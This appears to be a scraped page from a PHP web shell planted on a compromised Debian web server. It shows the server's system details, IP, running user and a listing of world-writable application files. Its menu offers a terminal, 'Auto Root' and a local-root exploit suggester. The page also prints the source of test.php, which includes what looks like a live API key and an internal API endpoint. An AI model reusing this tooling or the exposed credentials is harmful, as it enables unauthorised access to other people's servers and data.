Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
ctm.bdcloud.fr /
iReception /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2020-09-03 11:41
Controllers
[ DIR ]
drwxrwxrwx
2020-09-03 11:41
Ressources
[ DIR ]
drwxrwxrwx
2020-09-03 11:41
Views
[ DIR ]
drwxrwxrwx
2020-09-03 11:41
.gitignore
108
B
-rwxrwxrwx
2020-09-08 17:03
JsBarcode.all.min.js
69.58
KB
-rwxrwxrwx
2020-09-08 17:03
apitest.php
787
B
-rwxrwxrwx
2020-09-08 17:03
help.txt
200
B
-rwxrwxrwx
2020-09-08 17:03
test.html
662
B
-rwxrwxrwx
2020-09-08 17:03
test.php
773
B
-rwxrwxrwx
2020-09-08 17:03
Save
Rename
<?php $data = array( 'ref' => $_GET['code_commande'], 'qty' => 3, 'id_fournisseur' => 1 ); # Create a connection $url = 'http://82.253.71.109/prod/ctm_v11/api/index.php/ireceptionapi/commandes'; $ch = curl_init($url); # Form data string $postString = http_build_query($data, '', '&'); # Setting our options curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postString); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'DOLAPIKEY: 7a4344c51bbf94c246c47898d846e00224e62452') ); # Get the response $response = curl_exec($ch); echo $response; ?>